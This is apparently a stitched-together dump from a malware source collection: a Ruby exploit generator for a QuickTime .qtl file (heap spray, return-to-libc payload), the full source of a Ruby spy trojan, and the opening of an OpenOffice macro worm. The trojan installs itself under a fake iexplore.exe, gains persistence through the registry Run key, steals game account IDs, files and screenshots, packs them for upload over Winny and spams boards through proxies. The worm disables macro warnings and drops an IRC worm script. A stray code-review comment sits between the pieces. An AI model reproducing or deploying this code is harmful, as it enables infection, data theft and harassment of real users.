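+# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html
+
+# Command string: Use whatever you like.
+# Remember that changing this will also need a change of the target address for system(),
+# unless string length is the same.
+CMD_STRING = "/usr/bin/say Happy new year shit bag"
+
+# Mac OS X 10.4.8 (8L2127)
+EBP_ADDR = 0xdeadbabe
+SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
+SETUID_ADDR = 0x900334f0
+CURL_ADDR = 0x916c24bc # /usr/bin/curl
+SHELL_ADDR = 0x918bef3a # /bin/sh
+CMDSTR_ADDR = [
+SHELL_ADDR, # 0 addr to static /bin/sh (lame)
+0x017a053c, # 1 addr to our command string (cool) :> (change as necessary)
+0xbabeface, # 2 bogus addr for testing.
+CURL_ADDR # 3 addr to '/usr/bin/curl'
+]
+
+# Payload. default to CMDSTR_ADDR 0 (/bin/sh)
+HAPPY = ("A" * 299) +
+[EBP_ADDR].pack("V") +
+[SYSTEM_ADDR].pack("V") +
+[SETUID_ADDR].pack("V") +
+[CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR)
+
+# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
+# although, for using our own fu, we need to spray some data for better reliability
+# the goal is causing allocation of large heap chunks
+NEW = ("\x90" * 30000) + CMD_STRING # feed the heap
+YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go
+APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more
+BOYZ = ("\x90" * 30000) + "FOOM" # and more
+
+# QTL output template
+QTL_CONTENT = "<?xml version=\"1.0\"?>" +
+"<?quicktime type=\"application/x-quicktime-media-link\"?>" +
+"<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
+"qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
+"src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"
+
+target_file = File.open("pwnage.qtl", "w+") { |f|
+f.print(QTL_CONTENT)
+f.close
+}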
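Review bot: `File.open("pwnage.qtl", "w+") { |f| ... }` with a block closes the file itself when the block finishes, so the explicit `f.close` inside the block is redundant, and since the block form returns the block's value (here `nil` from `f.close`), `target_file` never holds a file handle and is effectively unused. If the handle is not needed afterwards the last four lines reduce to `File.open("pwnage.qtl", "w+") { |f| f.print(QTL_CONTENT) }`; if it is, use the non-block form and close it explicitly. The shebang on the second line is also preceded by a blank first line, so it is not honoured when the script is executed directly.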
574
Ruby/Trojan-Spy.Ruby.Kakkeys.d
@ -0,0 +1,574 @@
|
||||
$KCODE = 's'
|
||||
#$DEBUG = true
|
||||
#Exerb = nil
|
||||
require 'Win32API'
|
||||
if ARGV.size == 1 and ARGV[0].include?('RoAddr')
|
||||
$path = ARGV[0]
|
||||
if File.exist?($path)
|
||||
$rost = Win32API.new($path, 'RO_GetNowState', '', 'l')
|
||||
$rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p')
|
||||
$ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p')
|
||||
$roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i')
|
||||
$roin.call(0, '', 0x7FFFFFFF)
|
||||
$rost.call
|
||||
if $rost.call == 2
|
||||
print $ropa.call(258).to_s + "[#{$rowld.call}]"
|
||||
end
|
||||
end
|
||||
exit
|
||||
end
|
||||
require 'win32/registry'
|
||||
require 'ftools'
|
||||
def dll(file)
|
||||
if !File.exist?('C:/windows/system32/' + file)
|
||||
f = Exerb.open(file)
|
||||
f.binmode
|
||||
open('C:/windows/system32/' + file, 'w'){|f2|
|
||||
f2.binmode
|
||||
f.read 9
|
||||
p f2.write(f.read)
|
||||
}
|
||||
f.close
|
||||
end
|
||||
end
|
||||
if Exerb
|
||||
if !Exerb.filepath.include?('iexplore')
|
||||
File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe')
|
||||
`start install.exe`
|
||||
dll('zlib.dll')
|
||||
dll('7-zip32.dll')
|
||||
dll('imgctl.dll')
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
|
||||
}
|
||||
`start C:\\windows\\system32\\iexplore.exe`
|
||||
exit
|
||||
else
|
||||
=begin
|
||||
$double = Thread.new{
|
||||
cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l')
|
||||
rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l')
|
||||
ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l')
|
||||
om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l')
|
||||
gle = Win32API.new('kernel32', 'GetLastError', '', 'l')
|
||||
|
||||
hage = cm.call(0, 0, 'hagemoe')
|
||||
if gle.call == 183
|
||||
ch.call hage
|
||||
hage = nil
|
||||
hagege = cm.call(0, 0, 'hagegemoe')
|
||||
if gle.call == 183
|
||||
ch.call hagege
|
||||
exit 1
|
||||
end
|
||||
elsif
|
||||
0
|
||||
end
|
||||
if hage
|
||||
s = 'hagegemoe'
|
||||
else
|
||||
s = 'hagemoe'
|
||||
end
|
||||
while(1)
|
||||
a = om.call(1, 0, s)
|
||||
if a == 0
|
||||
if ARGV[0] == 'aaa'
|
||||
p system("start #{Exerb.filepath}")
|
||||
else
|
||||
p system("strat #{Exerb.filepath} aaa")
|
||||
end
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
|
||||
}
|
||||
sleep 0.1
|
||||
else
|
||||
ch.call(a)
|
||||
end
|
||||
#p "sss"
|
||||
sleep 0.04
|
||||
end
|
||||
}
|
||||
=end
|
||||
end
|
||||
end
|
||||
if ARGV[0] == 'aaa'
|
||||
sleep
|
||||
end
|
||||
END {
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
|
||||
}
|
||||
}
|
||||
require 'kconv'
|
||||
require 'web/agent'
|
||||
require 'web/linkextor'
|
||||
|
||||
|
||||
$wait_time = 1
|
||||
$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']]
|
||||
|
||||
$category = ''
|
||||
$bbs = ''
|
||||
|
||||
$ropath = []
|
||||
$korepath = []
|
||||
$nypath = []
|
||||
$toolpath = []
|
||||
$charanames = []
|
||||
$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe']
|
||||
$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe']
|
||||
$kakikomi = []
|
||||
$id = ''
|
||||
$charaarr = []
|
||||
$charas = ''
|
||||
$tekito_id = ''
|
||||
def Dir.copy(from, to, *jogai)
|
||||
begin
|
||||
sleep 0.01
|
||||
Dir.foreach(from){|x|
|
||||
if !x.match(/^\.\.?/)
|
||||
if File.directory?(from + x)
|
||||
Dir.mkdir(to + x)
|
||||
Dir.copy(from + x + '/', to + x + '/', *jogai)
|
||||
else
|
||||
if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0
|
||||
File.copy(from + x, to + x)
|
||||
end
|
||||
end
|
||||
end
|
||||
}
|
||||
rescue
|
||||
return 1
|
||||
end
|
||||
0
|
||||
end
|
||||
def delete_dir(dir)
|
||||
begin
|
||||
Dir.foreach(dir){|x|
|
||||
if !x.match(/^\.\.?/)
|
||||
if File.directory?(dir + x)
|
||||
if Dir.entries(dir + x).size <= 2
|
||||
Dir.delete(dir + x)
|
||||
else
|
||||
delete_dir(dir + x + '/')
|
||||
end
|
||||
else
|
||||
File.delete(dir + x)
|
||||
end
|
||||
end
|
||||
}
|
||||
Dir.delete(dir)
|
||||
rescue
|
||||
return 1
|
||||
end
|
||||
0
|
||||
end
|
||||
def roname
|
||||
abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb
|
||||
return nil if abx.size == 0
|
||||
$charanames.push(abx) if !$charanames.include?(abx)
|
||||
savedata($savefile)
|
||||
abx
|
||||
end
|
||||
def emotion_wana wana
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
for i in 0..9
|
||||
key.write_s(i.to_s, wana)
|
||||
end
|
||||
}
|
||||
end
|
||||
def upfolder(folder, trip)
|
||||
Dir.mkdir(folder) if !File.exist?(folder)
|
||||
begin
|
||||
$nypath.each{|x|
|
||||
File.chmod(0777, x + '/upfolder.txt')
|
||||
open(x + '/UpFolder.txt', 'a+'){|f|
|
||||
f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン')
|
||||
}
|
||||
}
|
||||
rescue
|
||||
end
|
||||
folder
|
||||
end
|
||||
def saiki dir
|
||||
sleep 0.01
|
||||
begin
|
||||
Dir.chdir(dir){
|
||||
#print Dir.pwd + "\n"
|
||||
$ropath.push Dir.pwd if File.exist?($tar[0])
|
||||
$korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1])
|
||||
sleep 0.01
|
||||
$nypath.push Dir.pwd if File.exist?($tar[2])
|
||||
$kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt')
|
||||
$toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0
|
||||
Dir.foreach('./'){ |x|
|
||||
if File.directory?(x) && !x.match(/\.\.?/)
|
||||
saiki(x)
|
||||
end
|
||||
}
|
||||
}
|
||||
rescue
|
||||
p $!
|
||||
ensure
|
||||
end
|
||||
end
|
||||
def search
|
||||
get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l')
|
||||
|
||||
for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('')
|
||||
if get_drv_type.call(drive + ':/') == 3
|
||||
saiki(drive + ':/')
|
||||
end
|
||||
end
|
||||
$ropath.uniq!
|
||||
$toolpath.uniq!
|
||||
$korepath.uniq!
|
||||
$nypath.uniq!
|
||||
end
|
||||
def savedata(path)
|
||||
open(path, 'w'){|f|
|
||||
Marshal.dump($ropath, f)
|
||||
Marshal.dump($korepath, f)
|
||||
Marshal.dump($nypath, f)
|
||||
Marshal.dump($toolpath, f)
|
||||
Marshal.dump($kakikomi, f)
|
||||
Marshal.dump($bbs_arr, f)
|
||||
Marshal.dump($charanames, f)
|
||||
Marshal.dump($tekito_id, f)
|
||||
}
|
||||
true
|
||||
end
|
||||
def loaddata(path)
|
||||
return false if !File.exists?(path)
|
||||
open(path){|f|
|
||||
$ropath = Marshal.load(f)
|
||||
$korepath = Marshal.load(f)
|
||||
$nypath = Marshal.load(f)
|
||||
$toolpath = Marshal.load(f)
|
||||
$kakikomi = Marshal.load(f)
|
||||
$bbs_arr = Marshal.load(f)
|
||||
$charanames = Marshal.load(f)
|
||||
$tekito_id = Marshal.load(f)
|
||||
}
|
||||
true
|
||||
end
|
||||
def rns *str
|
||||
if str.size == 1
|
||||
str = str[0].split('')
|
||||
end
|
||||
str[rand(str.size)]
|
||||
end
|
||||
def names
|
||||
begin
|
||||
$charaarr = []
|
||||
$charas = ''
|
||||
separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words)
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list|
|
||||
wisp_list.each_key{|server_str, sute|
|
||||
$charas += server_str + "\n"
|
||||
wisp_list.open(server_str){|server|
|
||||
server.each_key{|char_str, sute|
|
||||
$charaarr.push char_str.split("\0")[0]
|
||||
}
|
||||
}
|
||||
$charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n"
|
||||
$charaarr = []
|
||||
}
|
||||
}
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]}
|
||||
rescue
|
||||
p $1
|
||||
end
|
||||
end
|
||||
names
|
||||
|
||||
$upup = upfolder('C:\program files\daemontools\\', '')
|
||||
$capture = Proc.new{
|
||||
loop do
|
||||
getDC = Win32API.new('user32', 'GetDC', 'l', 'l')
|
||||
releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l')
|
||||
dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l')
|
||||
dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i')
|
||||
deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i')
|
||||
begin
|
||||
akakaka = roname
|
||||
hdc = getDC.call(0)
|
||||
hdib = dc2dib.call(hdc,0,0,0,0)
|
||||
dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' 「'+$charanames.join('」「')+'」.png', hdib, 0)
|
||||
File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0)
|
||||
ensure
|
||||
deleteDib.call(hdib)
|
||||
releaceDC.call(0, hdc)
|
||||
end
|
||||
if akakaka
|
||||
jikan = Time.now
|
||||
if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18
|
||||
emotion_wana "やあ僕BOTer!#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!"
|
||||
sleep 5 * 60
|
||||
else
|
||||
sleep 12 * 60
|
||||
end
|
||||
else
|
||||
begin
|
||||
open('c:/program files/internet explorer/iexplore.exe', 'a'){}
|
||||
sleep 20 * 60
|
||||
rescue
|
||||
sleep 15 * 60
|
||||
end
|
||||
end
|
||||
end
|
||||
}
|
||||
#init
|
||||
$savefile = 'C:/RECYCLER/explorer.sys'
|
||||
if !loaddata($savefile)
|
||||
Thread.new(&$capture)
|
||||
search
|
||||
savedata($savefile)
|
||||
else
|
||||
Thread.new(&$capture)
|
||||
end
|
||||
if $tekito_id.size == 0
|
||||
$tekito_id = $id
|
||||
end
|
||||
#p $ropath, $korepath, $nypath, $toolpath, $charanames
|
||||
if Dir.glob('C:/program files/daemontools/*.zip').size == 0
|
||||
begin
|
||||
tmpf = 'C:/RECYCLER/tmp/'
|
||||
Dir.mkdir(tmpf) if !File.exist?(tmpf)
|
||||
$toolpath.each{|x|
|
||||
to = tmpf + x.gsub(/\/|:/, '_')
|
||||
if File.exist?(to);to = to + '_';end
|
||||
Dir.mkdir(to)
|
||||
Dir.copy(x + '/', to + '/', 'txt')
|
||||
}
|
||||
$korepath.each{|x|
|
||||
to = tmpf + x.gsub(/\/|:/, '_')
|
||||
if File.exist?(to);to = to + '_';end
|
||||
Dir.mkdir(to)
|
||||
Dir.copy(x + '/', to + '/', 'fld')
|
||||
}
|
||||
$ropath.each{|x|
|
||||
to = tmpf + x.gsub(/\/|:/, '_')
|
||||
if File.exist?(to);to = to + '_';end
|
||||
Dir.mkdir(to)
|
||||
Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld')
|
||||
}
|
||||
$nypath.each_with_index{|x, i|
|
||||
if i == 0
|
||||
to = tmpf + 'winny'
|
||||
else
|
||||
to = tmpf + 'winny' + i.to_s
|
||||
end
|
||||
Dir.mkdir(to) if !File.exist?(to)
|
||||
File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt')
|
||||
File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt')
|
||||
File.copy(x + '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt')
|
||||
}
|
||||
$kakikomi.each{|x|
|
||||
File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x)
|
||||
}
|
||||
seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i')
|
||||
str = 'aaaaa'
|
||||
|
||||
seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5)
|
||||
rescue
|
||||
p $!
|
||||
print $!.backtrace.join("\n")
|
||||
ensure
|
||||
delete_dir tmpf
|
||||
end
|
||||
end
|
||||
#exit
|
||||
|
||||
$path = $ropath[0] + '/'
|
||||
|
||||
$roaddr = File.exist?($path + 'roaddr.dll')
|
||||
$ro = File.exist?($path + 'ragexe.exe')
|
||||
$are = File.exist?($path + 'ws2_32.dll')
|
||||
$rtx = File.exist?($path + 'ddraw.dll')
|
||||
def rtx
|
||||
rns(rns('rRrR'), rns('あアア') + rns('ー-‐-あアア') + rns('るルル')) +
|
||||
rns(rns('tTtT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー-‐-')) +
|
||||
rns(rns('xXxX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス'))
|
||||
end
|
||||
|
||||
def aretool
|
||||
rns(rns('aAaA'), rns('あアア')) +
|
||||
rns(rns('rRrR') + rns('eEeE'), rns('れレレ')) +
|
||||
rns(rns('tTtT') + rns('oOoO00'), rns('つツツ')) +
|
||||
rns(rns('oOoO00'), rns('うウウー-‐-')) +
|
||||
rns(rns('lLlL'), rns('るルル'))
|
||||
end
|
||||
$nypath.each{|x|
|
||||
if File.exist?(x + '/Tab1.txt')
|
||||
open(x + '/Tab1.txt'){|f|
|
||||
$omosiro_words = f.read.split("\n")
|
||||
}
|
||||
end
|
||||
}
|
||||
|
||||
def getThreads
|
||||
http = Web::Agent.new
|
||||
http.setup
|
||||
http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
|
||||
$category, $bbs = *$bbs_arr[rand($bbs_arr.size)]
|
||||
http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt")
|
||||
$suret = http.rsp.body.split("\n")
|
||||
sss = []
|
||||
$suret.each{|sure|
|
||||
if !sure.match(/.*\(10000?\)/)
|
||||
sure.match(/^(\d+)/)
|
||||
sss.push $1
|
||||
end
|
||||
}
|
||||
return sss;
|
||||
end
|
||||
#p '書き込み開始'
|
||||
|
||||
agent = Web::Agent.new
|
||||
agent.setup
|
||||
agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
|
||||
agent.get('http://www.cybersyndrome.net/pla.html')
|
||||
agent.rsp.body.match("")
|
||||
proxy = []
|
||||
while($'.match(/\"A\">([^<>]*)<\/a>/)) #'
|
||||
proxy.push($~[1])
|
||||
end
|
||||
proxy.delete_if{|pr|
|
||||
pr.match(/(80)|(8080)/)
|
||||
}
|
||||
proxy.collect! do |i|
|
||||
i.split(':')
|
||||
end
|
||||
|
||||
count = 0
|
||||
while(1)
|
||||
sure = getThreads;
|
||||
if rand(6) == 0
|
||||
for ituuu in 0..9
|
||||
age = Web::Agent.new
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
|
||||
age.get 'http://yy14.kakiko.com/landstriker/subject.txt'
|
||||
suret = age.rsp.body.split("\n")
|
||||
sss = []
|
||||
suret.each{|sure|
|
||||
if !sure.match(/.*\(10000?\)/)
|
||||
sure.match(/^(\d+)/)
|
||||
sss.push $1
|
||||
end
|
||||
}
|
||||
Thread.new{
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
ran = rand(proxy.size)
|
||||
if rand(2) == 1
|
||||
age.proxy_host = proxy[ran][0]
|
||||
age.proxy_port = proxy[ran][1]
|
||||
end
|
||||
if sss.size != 0
|
||||
if $id == ''
|
||||
age.req.form.add 'FROM', (10000 + rand(90000)).to_s
|
||||
age.req.form.add 'mail', 'sage'
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
|
||||
else
|
||||
names
|
||||
age.req.form.add 'FROM', $id
|
||||
age.req.form.add 'mail', ''
|
||||
massage = ''
|
||||
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
|
||||
massage += rtx + "\n" if $rtx
|
||||
massage += aretool + "\n" if $are
|
||||
massage += "RoAddr\n" if $roaddr && rand(2) == 1
|
||||
massage += "KORE\n" if $korepath.size > 0
|
||||
massage += $charas
|
||||
age.req.form.add 'MESSAGE', massage
|
||||
end
|
||||
age.req.form.add 'bbs', 'landstriker'
|
||||
age.req.form.add 'key', sure[rand(sure.size)]
|
||||
age.req.form.add 'time', Time.now.to_i.to_s
|
||||
age.req.form.add 'submit', '書き込む'
|
||||
age.post('http://yy14.kakiko.com/test.bbs.cgi')
|
||||
else
|
||||
suret[rand(suret.size)].match(/,(.+)\(/)
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
age.req.form.add 'FROM', ''
|
||||
age.req.form.add 'mail', ''
|
||||
age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
|
||||
age.req.form.add 'bbs', $bbs
|
||||
age.req.form.add 'time', Time.now.to_s.toi
|
||||
age.req.form.add 'submit', '新規スレッド作成'
|
||||
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
|
||||
end
|
||||
}
|
||||
end
|
||||
else
|
||||
if sure.size != 0
|
||||
loop do
|
||||
sleep $wait_time
|
||||
r = rand proxy.size
|
||||
Thread.new(r, proxy){|ran, pro|
|
||||
age = Web::Agent.new
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
if rand(2) == 1
|
||||
age.proxy_host = pro[ran][0]
|
||||
age.proxy_port = pro[ran][1]
|
||||
end
|
||||
if $id == ''
|
||||
age.req.form.add 'NAME', (10000 + rand(90000)).to_s
|
||||
age.req.form.add 'MAIL', 'sage'
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
|
||||
else
|
||||
names
|
||||
age.req.form.add 'NAME', $id.chop.chop
|
||||
age.req.form.add 'MAIL', ''
|
||||
massage = ''
|
||||
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
|
||||
massage += rtx + "\n" if $rtx
|
||||
massage += aretool + "\n" if $are
|
||||
massage += "RoAddr\n" if $roaddr && rand(2) == 1
|
||||
massage += "KORE\n" if $korepath.size > 0
|
||||
massage += $charas
|
||||
age.req.form.add 'MESSAGE', massage
|
||||
end
|
||||
age.req.form.add 'BBS', $bbs
|
||||
age.req.form.add 'KEY', sure[rand(sure.size)]
|
||||
age.req.form.add 'TIME', Time.now.to_s.to_i
|
||||
age.req.form.add 'DIR', $category
|
||||
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
|
||||
}
|
||||
count += 1
|
||||
break if count % 10 == 0
|
||||
end
|
||||
else
|
||||
$suret[rand($suret.size)].match(/,(.+)\(/)
|
||||
age = Web::Agent.new
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
age.req.form.add 'NAME', ''
|
||||
age.req.form.add 'MAIL', ''
|
||||
age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
|
||||
age.req.form.add 'BBS', $bbs
|
||||
age.req.form.add 'TIME', Time.now.to_s.to_i
|
||||
age.req.form.add 'DIR', $category
|
||||
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
while Thread.list.size > 2
|
||||
sleep 10
|
||||
end
|
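--- a/Ruby/Virus.Ruby.Badbunny.a
+++ b/Ruby/Virus.Ruby.Badbunny.a
@@ -0,0 +1,314 @@
+Dim Url As String
+Dim myFileProp as Object
+
+Sub badbunny()
+rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
+Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
+mEventProps(0).Name = "EventType"
+mEventProps(0).Value = "StarBasic"
+mEventProps(1).Name = "Script"
+mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
+com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
+ThisComponent.LockControllers
+oDocument = ThisComponent
+otext=oDocument.text
+ocursor=otext.createtextcursor()
+otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
+url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
+oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
+msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
+call ping
+end sub
+
+sub startgame
+if GetGUIType =1 then 'windows
+call win
+end if
+if GetGUIType =3 then 'MacOS
+call mac
+end if
+if GetGUIType =4 then 'linux
+call lin
+end if
+end sub
+
+sub win
+Dim dirz As String
+Dim dummy()
+Dim iVar As Integer
+Dim Args(0) as new com.sun.star.beans.PropertyValue
+Args(0).Name = "MacroExecutionMode"
+Args(0).Value = _
+com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
+ThisComponent.LockControllers
+datei="c:\badbunny.odg"
+dateiurl=converttourl(datei)
+odoc=thisComponent
+odoc.storeasurl(dateiurl,dummy())
+dirz=Environ ("programfiles")
+
+Open "c:\drop.bad" For Output As #1
+Print #1, "[script]"
+Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
+Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
+Print #1, "n2=on 1:start:{"
+Print #1, "n3= /if $day == Friday { /echo }"
+Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
+Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
+Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
+Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
+Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
+Print #1, "n9=on 1:part:#:{"
+Print #1, "n10=set %M_E $me"
+Print #1, "n11=set %NickName $nick"
+Print #1, "n12=set %ccd .dcc"
+Print #1, "n13= if %NickName != %M_E {"
+Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
+Print #1, "n15= /msg %NickName Be my bunny!"
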